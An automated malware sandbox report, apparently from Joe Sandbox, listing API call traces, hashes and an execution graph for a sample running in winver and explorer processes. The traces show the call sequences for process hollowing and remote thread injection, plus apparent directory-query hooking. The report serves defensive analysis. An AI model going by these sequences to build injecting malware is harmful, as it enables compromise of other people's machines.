                                                                                                                                                                  • Part of subcall function 03390643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 03390900
                                                                                                                                                                  • Part of subcall function 03390CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03390D07
                                                                                                                                                                  • Part of subcall function 03390CE8: Sleep.KERNELBASE(000003E8), ref: 03390D1D
                                                                                                                                                                  • Part of subcall function 03390CE8: Process32First.KERNEL32(?,00000000), ref: 03390D3D
                                                                                                                                                                  • Part of subcall function 03390CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 03390D88
                                                                                                                                                                  • Part of subcall function 03390CE8: Process32Next.KERNEL32(?,?), ref: 03390D9E
                                                                                                                                                                  • Part of subcall function 03390CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 03390DCA
                                                                                                                                                                  • Part of subcall function 03390CE8: Sleep.KERNELBASE(000003E8), ref: 03390DD5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4243289212-0
                                                                                                                                                                • Opcode ID: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                • Instruction ID: 5fa97a6c67858940f239cafa5f4a4b21371961c09d75ec6c0873201f641d5d40
                                                                                                                                                                • Opcode Fuzzy Hash: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                • Instruction Fuzzy Hash: 11D01CAA854321FEFF08BAB48CC883B329CEE00200304497BAC85ED065EA204A808976
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 03392DCF Relevance: 12.1, APIs: 8, Instructions: 52encryptionCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,03392DA0,0000002F,?,00000000,00000001,F0000000), ref: 03392DE0
                                                                                                                                                                • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 03392E06
                                                                                                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 03392E29
                                                                                                                                                                • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 03392E43
                                                                                                                                                                • CryptVerifySignatureA.ADVAPI32(?,03392A30,03392A2C,?,00000000,00000000), ref: 03392E63
                                                                                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 03392E71
                                                                                                                                                                • CryptDestroyKey.ADVAPI32(?), ref: 03392E7D
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 03392E8B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 295346115-0
                                                                                                                                                                • Opcode ID: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                • Instruction ID: a9588953a4301efdc7b5dce24028529ce33ef8720696c2ca29285a6db3fef14f
                                                                                                                                                                • Opcode Fuzzy Hash: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                • Instruction Fuzzy Hash: 34111C31A00618BFEF225F20CC85BDA7B79AF54700F1445D5BE8ABD0A4DBB189A0DF58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 03390959
                                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 03390961
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390981
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 03390999
                                                                                                                                                                  • Part of subcall function 033909D9: CreateProcessA.KERNEL32(00000000,033909D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 033909E0
                                                                                                                                                                  • Part of subcall function 033909D9: GetThreadContext.KERNEL32(?,00000000), ref: 03390A08
                                                                                                                                                                  • Part of subcall function 033909D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 03390A33
                                                                                                                                                                  • Part of subcall function 033909D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,03395810,00000000,00000000,00000002), ref: 03390A78
                                                                                                                                                                  • Part of subcall function 033909D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 03390AA6
                                                                                                                                                                  • Part of subcall function 033909D9: ResumeThread.KERNEL32(?), ref: 03390AB6
                                                                                                                                                                  • Part of subcall function 033909D9: Sleep.KERNEL32(000003E8), ref: 03390AC6
                                                                                                                                                                  • Part of subcall function 033909D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1099281029-0
                                                                                                                                                                • Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                • Instruction ID: 1f53164439c3b245fb970c75176261bb947708fbd6863543f9909df13ca610c2
                                                                                                                                                                • Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                • Instruction Fuzzy Hash: 71518231644354AFFF169F20CCC5B9A77BCAF04744F0801DABA45FE0D6DAB09594CAA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033934B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37stringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 033934A2
                                                                                                                                                                • lstrcat.KERNEL32(00000000,033934AD), ref: 033934B1
                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000000), ref: 033934C2
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 033934CD
                                                                                                                                                                  • Part of subcall function 0339276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 03392787
                                                                                                                                                                  • Part of subcall function 0339276C: lstrcat.KERNEL32(00000000,033927D1), ref: 033927E0
                                                                                                                                                                  • Part of subcall function 0339276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 03392805
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 033934E7
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 033934EE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
                                                                                                                                                                • String ID: W
                                                                                                                                                                • API String ID: 1406046206-655174618
                                                                                                                                                                • Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                • Instruction ID: ef3ec26e5c51c7c41206fbc71775e80153d0f7335f2cf358adfcd1693d21f08e
                                                                                                                                                                • Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                • Instruction Fuzzy Hash: 04F08175104500AEFB136F208CC8FBE3ABCAF41715F040099FD45FD059CB7441558A69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033909D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,033909D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 033909E0
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 03390A08
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 03390A33
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,03395810,00000000,00000000,00000002), ref: 03390A78
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 03390AA6
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 03390AB6
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 03390AC6
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 03390ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                • Instruction ID: 5fa828bd603870724301637b747acb45afb63b0c151a8cd82c3295db3e432ae2
                                                                                                                                                                • Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                • Instruction Fuzzy Hash: 79312B316402159FFF269F14CCC5BAA77BCAF04744F080195AA49FE0E5DBB09694CEA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033931C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 033931EA
                                                                                                                                                                  • Part of subcall function 033926F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
                                                                                                                                                                  • Part of subcall function 033926F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
                                                                                                                                                                  • Part of subcall function 033926F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
                                                                                                                                                                  • Part of subcall function 033926F9: CloseHandle.KERNEL32(?), ref: 0339275F
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 03393228
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,033931B5,00000011,?,00000000,00000000), ref: 03393255
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,033931B5,00000011,?,00000000,00000000,00000000,0339306E,00000004,00000000), ref: 03393261
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,033931B5,00000011,?,00000000,00000000,00000000,0339306E,00000004,00000000), ref: 0339326D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1477093598-0
                                                                                                                                                                • Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                • Instruction ID: 18192be59e4bdb8bded702a23b36eefa29096d51947df12ba4608cc4d2e563f5
                                                                                                                                                                • Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                • Instruction Fuzzy Hash: 571127B6804918EFEF12AF60CC84B9F77BDEF40305F0549AAE586EA014DA345A90CE55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339343F Relevance: 7.5, APIs: 5, Instructions: 43processmemorystringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0339344D
                                                                                                                                                                • Process32First.KERNEL32(00000000,00000000), ref: 03393473
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 0339348B
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 033934A2
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 033934EE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1167326197-0
                                                                                                                                                                • Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                • Instruction ID: 0d84ba828c66bdfe04a1925697b2baa3f49373fc768df1c99f24d61c978887fb
                                                                                                                                                                • Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                • Instruction Fuzzy Hash: 410147B0101200EFFF239A208C88BA976EC9F00720F0800A9BD44EE0C5DF74C4518564
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03393F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F2D
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F4B
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 03393F5B
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 03393F6B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                • Instruction ID: 608faa6d4a59d422dba8757afc2ce219da828422d74a7053479ca400b37f6c07
                                                                                                                                                                • Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                • Instruction Fuzzy Hash: 32F01CBCD88340EAFF40BBB48CC965977B8AF40755F040692AA8BAD4D4DE7489508E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03393EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(03393EBD,00000006,E8FFFE1B,00000000), ref: 03393EC8
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,03393F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 03393F2D
                                                                                                                                                                  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 310444273-2747090070
                                                                                                                                                                • Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                • Instruction ID: fc3617a0d43bdae87a995d0787c129ae117b5ad2a86ac9b76662c10f64149c01
                                                                                                                                                                • Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                • Instruction Fuzzy Hash: 75F044FD944344EDFF11FA708CC4BAAB3BCAF40655F044157A987DD040DE308940CAA6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:2.6%
                                                                                                                                                                Total number of Nodes:193
                                                                                                                                                                Total number of Limit Nodes:20
                                                                                                                                                                execution_graph 4979 1342334 4981 13422f7 4979->4981 4980 1342394 4981->4980 4982 134228b NtQueryDirectoryFile 4981->4982 4982->4980 4982->4981 5203 1342270 5204 134228b NtQueryDirectoryFile 5203->5204 5205 1342394 5204->5205 5206 13422f7 5204->5206 5206->5204 5206->5205 4983 1341ee1 NtCreateUserProcess 4984 13408b3 4985 13408d0 4984->4985 4986 13408b9 4984->4986 5008 13408d9 4985->5008 4998 1341e62 4986->4998 4999 1341e73 4998->4999 5016 1341d5a 4999->5016 5002 1341d5a 3 API calls 5003 1341eb9 5002->5003 5004 1341d5a 3 API calls 5003->5004 5005 1341ecc 5004->5005 5006 1341d5a 3 API calls 5005->5006 5007 13408c5 RtlExitUserThread 5006->5007 5007->4985 5024 1340cc4 5008->5024 5010 13408e5 5027 1340643 5010->5027 5012 134091f 5035 134093e 5012->5035 5014 13408ef 5014->5012 5015 1341e62 3 API calls 5014->5015 5015->5012 5017 1341e60 5016->5017 5018 1341d6e 5016->5018 5017->5002 5018->5017 5019 1341d80 VirtualProtect 5018->5019 5019->5017 5020 1341dac 5019->5020 5021 1341daf VirtualAlloc 5020->5021 5021->5021 5022 1341de1 5021->5022 5023 1341e09 VirtualProtect 5022->5023 5023->5017 5042 1340c3f GetPEB 5024->5042 5026 1340cc9 5026->5010 5028 1340660 5027->5028 5044 134067c 5028->5044 5030 1340673 5050 13406c2 5030->5050 5032 134080f 5032->5014 5033 13406b9 5033->5032 5054 1340811 5033->5054 5036 1340cc4 GetPEB 5035->5036 5038 134094a 5036->5038 5037 1340af1 5037->5012 5038->5037 5069 13409d9 5038->5069 5040 13409d2 5040->5037 5073 1340af3 5040->5073 5043 1340c4b 5042->5043 5043->5026 5043->5043 5045 1340681 5044->5045 5046 13406c2 6 API calls 5045->5046 5048 13406b9 5046->5048 5047 134080f 5047->5030 5048->5047 5049 1340811 6 API calls 5048->5049 5049->5047 5052 13406c7 5050->5052 5051 134080f 5051->5033 5052->5051 5053 1340811 6 API calls 5052->5053 5053->5051 5059 1340840 5054->5059 5055 13408d0 5057 13408d9 5 API calls 5055->5057 5056 13408c5 RtlExitUserThread 5056->5055 5058 1340863 5057->5058 5060 1340866 5058->5060 5061 1340cc4 GetPEB 5058->5061 5059->5055 5059->5056 5059->5058 5059->5060 5063 1341e62 3 API calls 5059->5063 5060->5032 5062 13408e5 5061->5062 5064 1340643 5 API calls 5062->5064 5063->5056 5067 13408ef 5064->5067 5065 134091f 5066 134093e 5 API calls 5065->5066 5066->5065 5067->5065 5068 1341e62 3 API calls 5067->5068 5068->5065 5072 13409de 5069->5072 5070 1340af3 6 API calls 5071 1340af1 5070->5071 5071->5040 5072->5070 5072->5071 5075 1340b01 5073->5075 5076 1340cc4 GetPEB 5075->5076 5077 1340b0d 5076->5077 5082 1340b27 5077->5082 5079 1340b20 5080 1340b57 5079->5080 5086 1340b65 5079->5086 5083 1340b2c 5082->5083 5084 1340b65 6 API calls 5083->5084 5085 1340b57 5084->5085 5085->5079 5090 1340b6a 5086->5090 5092 13408b3 5090->5092 5093 13408d0 5092->5093 5094 13408b9 5092->5094 5095 13408d9 5 API calls 5093->5095 5097 1341e62 3 API calls 5094->5097 5096 13408d5 5095->5096 5098 1340cc4 GetPEB 5096->5098 5099 13408c5 RtlExitUserThread 5097->5099 5100 13408e5 5098->5100 5099->5093 5101 1340643 5 API calls 5100->5101 5104 13408ef 5101->5104 5102 134091f 5103 134093e 5 API calls 5102->5103 5103->5102 5104->5102 5105 1341e62 3 API calls 5104->5105 5105->5102 5106 1341f5e 5107 1341f82 5106->5107 5108 1341f6c 5106->5108 5110 1341f8d VirtualAllocEx WriteProcessMemory CreateRemoteThread 5108->5110 5110->5107 5207 1370b6b 5209 1370b7d 5207->5209 5208 13708b3 7 API calls 5210 1370bb1 5208->5210 5209->5208 5211 1370c3f GetPEB 5210->5211 5212 1370bb6 5211->5212 5212->5212 5111 13708d9 5119 1370cc4 5111->5119 5113 13708e5 5122 1370643 5113->5122 5115 1370939 5130 137093e 5115->5130 5117 13708ef 5117->5115 5118 137091f SleepEx RtlExitUserThread 5117->5118 5118->5115 5137 1370c3f GetPEB 5119->5137 5121 1370cc9 5121->5113 5123 1370660 5122->5123 5139 137067c 5123->5139 5125 1370673 5145 13706c2 5125->5145 5127 137080f 5127->5117 5128 13706b9 5128->5127 5149 1370811 5128->5149 5131 1370cc4 GetPEB 5130->5131 5133 137094a 5131->5133 5132 1370af1 5132->5115 5133->5132 5169 13709d9 5133->5169 5136 13709d2 5136->5132 5173 1370af3 5136->5173 5138 1370c4b 5137->5138 5138->5121 5138->5138 5140 1370681 5139->5140 5141 13706c2 7 API calls 5140->5141 5143 13706b9 5141->5143 5142 137080f 5142->5125 5143->5142 5144 1370811 7 API calls 5143->5144 5144->5142 5146 13706c7 5145->5146 5147 137080f 5146->5147 5148 1370811 7 API calls 5146->5148 5147->5128 5148->5147 5151 1370840 5149->5151 5150 1370866 5150->5127 5151->5150 5153 1370863 5151->5153 5161 13708d9 5151->5161 5153->5150 5154 1370cc4 GetPEB 5153->5154 5155 13708e5 5154->5155 5156 1370643 5 API calls 5155->5156 5159 13708ef 5156->5159 5157 1370939 5158 137093e 5 API calls 5157->5158 5158->5157 5159->5157 5160 137091f SleepEx RtlExitUserThread 5159->5160 5160->5157 5162 1370cc4 GetPEB 5161->5162 5163 13708e5 5162->5163 5164 1370643 5 API calls 5163->5164 5167 13708ef 5164->5167 5165 1370939 5166 137093e 5 API calls 5165->5166 5166->5165 5167->5165 5168 137091f SleepEx RtlExitUserThread 5167->5168 5168->5165 5172 13709de 5169->5172 5170 1370af3 7 API calls 5171 1370af1 5170->5171 5171->5136 5172->5170 5172->5171 5175 1370b01 5173->5175 5176 1370cc4 GetPEB 5175->5176 5177 1370b0d 5176->5177 5182 1370b27 5177->5182 5179 1370b20 5181 1370b57 5179->5181 5186 1370b65 5179->5186 5181->5181 5183 1370b2c 5182->5183 5184 1370b65 7 API calls 5183->5184 5185 1370b57 5184->5185 5185->5179 5190 1370b6a 5186->5190 5192 13708b3 5190->5192 5194 13708b9 5192->5194 5193 13708d9 5 API calls 5195 13708d5 5193->5195 5194->5193 5196 1370cc4 GetPEB 5195->5196 5197 13708e5 5196->5197 5198 1370643 5 API calls 5197->5198 5201 13708ef 5198->5201 5199 1370939 5200 137093e 5 API calls 5199->5200 5200->5199 5201->5199 5202 137091f SleepEx RtlExitUserThread 5201->5202 5202->5199 5213 1340b6b 5215 1340b7d 5213->5215 5214 13408b3 6 API calls 5216 1340bb1 5214->5216 5215->5214 5217 1340c3f GetPEB 5216->5217 5218 1340bb6 5217->5218

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 01341F8D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80injectionmemorythreadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAllocEx.KERNELBASE ref: 01341FDE
                                                                                                                                                                • WriteProcessMemory.KERNEL32 ref: 01342000
                                                                                                                                                                • CreateRemoteThread.KERNEL32 ref: 01342028
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 1718980022-2766056989
                                                                                                                                                                • Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                • Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
                                                                                                                                                                • Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                • Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01342270 Relevance: 1.6, APIs: 1, Instructions: 132filenativeCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 53 1342270-1342288 54 134228b-13422f1 NtQueryDirectoryFile 53->54 55 1342394-1342398 54->55 56 13422f7-13422fc 54->56 56->55 57 1342302-1342309 56->57 57->55 58 134230f-134231b call 1342196 57->58 61 1342322-1342326 58->61 62 134231d-1342320 58->62 64 1342372-1342375 61->64 65 1342328-134232d 61->65 63 1342385-134238a 62->63 63->55 68 134238c-134238f 63->68 66 1342377-134237d 64->66 67 134237f-1342383 64->67 69 1342336-1342339 65->69 70 134232f 65->70 66->63 67->63 68->58 71 1342347-1342355 69->71 72 134233b-1342345 69->72 70->54 73 1342357-1342361 71->73 74 1342363 71->74 72->55 72->71 75 1342365-1342370 73->75 74->75 75->63
                                                                                                                                                                APIs
                                                                                                                                                                • NtQueryDirectoryFile.NTDLL ref: 013422E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DirectoryFileQuery
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3295332484-0
                                                                                                                                                                • Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                • Instruction ID: 7a9b81688a2db40c8f5b847e09044eeb72262b630aeddaae26f61545e25466d0
